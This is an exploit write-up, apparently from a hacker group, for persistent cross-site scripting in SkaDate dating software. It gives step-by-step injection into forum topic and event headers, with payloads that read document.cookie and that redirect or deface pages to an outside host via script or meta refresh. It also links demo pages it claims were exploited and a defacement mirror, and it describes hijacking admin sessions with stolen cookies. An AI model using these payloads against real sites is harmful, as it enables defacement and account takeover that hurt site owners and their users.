# Exploit Title: [Skadate Persistent Cross Site Scripting Vulnerability]
# Google Dork: [Powered by SkaDate dating]
# Date: [2 January 2011] 
# Author: Akastep
# Software Link: http://www.skadate.com 
# Version: SkaDate dating software
# Tested on: nginx/0.7.62      (php version: PHP/5.2.14)


----- [ Exploit: Persistent Cross Site Scripting Vulnerability in Skadate] --------


Login to Skadate system:
Go to forum section and open new topic:
In header of topic just inject your code:
For ex: <script>alert(document.cookie);</script>
Or for deface that forum section:
For ex:
<script>location.replace("http://upw_ned.com/");</script>

Or Just use HTML Meta redirect:

<meta http-equiv="refresh" content="0;url=http://upw_ned.com/u4pwned/">

And Post the topic.


Demo:
http://www.skadate.com/demo/forum/forum.php?forum_id=9
Or:
http://www.skadate.com/demo/forum/topic.php?topic_id=133

Defacement of skadate forum section:
http://mirror-az.com/mirror/?id=8338



Second Vuln again Persistent XSS:

Go to events and Create New Event
And inject in header of will created event javascript sceanrio:
<script>alert(document.cookie);</script>

Demo:
http://www.skadate.com/demo/member/event.php?eventId=78

Also this vuln will affect anyone of who views your profile.


Attacker who can expoit this vulnerability can deface site (using javascript or html meta redirect way)
Or he/she can grab admin  credentials (cookie session)  and then using Minibrowser login to system as admin with stealed cookies.


/Akastep

                                            wWw.Azhack.Com 
                                         WwW.Pirates-CrEW.org
                                       wWw.AzDeFaCers.Org


#############################################################################################
                                                 Allahu Akbar!
            
#############################################################################################